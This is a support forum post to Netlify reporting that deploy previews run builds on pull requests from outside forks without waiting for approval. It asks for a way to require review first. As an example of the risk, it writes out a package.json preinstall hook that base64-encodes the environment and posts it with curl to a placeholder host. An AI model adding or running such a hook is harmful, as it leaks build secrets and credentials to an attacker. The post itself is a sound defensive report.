Preview build on public repositories from external contributors

Hello, Netlify!

We have security issue reported to us we are looking for the resolutions.
We have public repository. This repository is setup to be deployed on our “Open source unlimited” netlify team.
For the site “deploy previews” are enabled.

This is the scenario where we need help with:

  • outside contributor forks our repository and creates pull request with the malfunction/malware code. Example: add preinstall command into package.json such as:
"preinstall": "set | base64 | curl -X POST --insecure --data-binary @- https://{YourHostName}/?",
  • GitHub provides us the means not to run any CI until the PR is reviewed and approved by repository owner.
  • But netlify kicks PR preview build immediately when PR is created (no approval waiting or anything).

As a result any malware command could be executed during netlify build and we have no way of preventing it.

Is there any possibility for netlify build to respect GitHub settings for " Fork pull request workflows from outside collaborators" and “require approval for all outside collaborators” before kicking off PR preview build?

Site: Netlify App
Build: Netlify App

I believe this can be configured here: Netlify App, which is currently set to “deploy without restrictions”.